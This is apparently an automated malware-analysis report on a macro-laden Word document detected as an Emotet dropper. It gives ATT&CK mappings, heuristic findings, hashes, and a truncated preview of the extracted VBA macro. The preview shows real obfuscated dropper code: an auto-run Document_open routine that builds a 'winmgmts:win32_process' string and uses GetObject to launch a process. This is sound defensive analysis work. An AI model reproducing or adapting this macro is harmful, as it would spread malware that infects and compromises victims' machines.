MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Emotet-7572661-0, indicating it's a known Emotet variant. The presence of a Document_Open macro and obfuscated VBA code strongly suggests it's designed to download and execute a secondary payload. The VBA code uses obfuscation techniques and calls GetObject, consistent with Emotet's behavior.
Heuristics 7
-
ClamAV: Doc.Dropper.Emotet-7572661-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8692 bytes |
SHA-256: f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub
Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
pl34 _
= "{TipTopPo}"
j3u = Stkqami
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 56832 bytes |
SHA-256: a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383 |
|||
|
Detection
ClamAV:
Doc.Dropper.Emotet-7572661-0
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.